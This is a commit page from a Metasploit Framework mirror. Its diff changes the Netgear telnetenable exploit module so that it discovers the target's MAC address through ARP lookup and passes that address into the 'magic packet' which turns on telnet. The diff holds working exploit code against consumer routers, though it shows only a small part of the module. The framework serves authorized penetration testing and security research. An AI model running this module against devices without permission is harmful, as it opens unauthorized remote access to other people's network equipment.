infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add MAC address discovery

GSoC/Meterpreter_Web_Console
William Vu 2018-03-02 19:02:44 -06:00
parent 107512498c
commit 6dbf9445c9
1 changed files with 29 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
modules/exploits/linux/telnet/netgear_telnetenable.rb
View File

@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Capture
def initialize(info = {})
super(update_info(info,
@ -58,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([
Opt::RPORT(23),
OptString.new('MAC', [true, 'MAC address of device']),
OptString.new('MAC', [false, 'MAC address of device']),
OptString.new('USERNAME', [false, 'Username on device']),
OptString.new('PASSWORD', [false, 'Password on device'])
])
@ -84,6 +85,9 @@ class MetasploitModule < Msf::Exploit::Remote
@proto = target[:proto]
detect_proto if @proto == :auto
# Use supplied or ARP-cached MAC address
configure_mac if @do_exploit
# Use supplied or default creds
configure_creds if @do_exploit
@ -120,6 +124,29 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
def configure_mac
@mac = datastore['MAC']
return if @mac
print_status('Attempting to discover MAC address via ARP')
begin
open_pcap
@mac = lookup_eth(rhost).first
rescue RuntimeError
fail_with(Failure::BadConfig, 'Superuser access required')
ensure
close_pcap
end
if @mac
print_good("Found MAC address #{@mac}")
else
fail_with(Failure::Unknown, 'Could not find MAC address')
end
end
def configure_creds
@username = datastore['USERNAME'] || target[:username]
@password = datastore['PASSWORD'] || target[:password]
@ -136,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit_telnetenabled
print_status('Generating magic packet')
payload = magic_packet(datastore['MAC'], @username, @password)
payload = magic_packet(@mac, @username, @password)
begin
print_status("Connecting to telnetenabled via #{@proto.upcase}")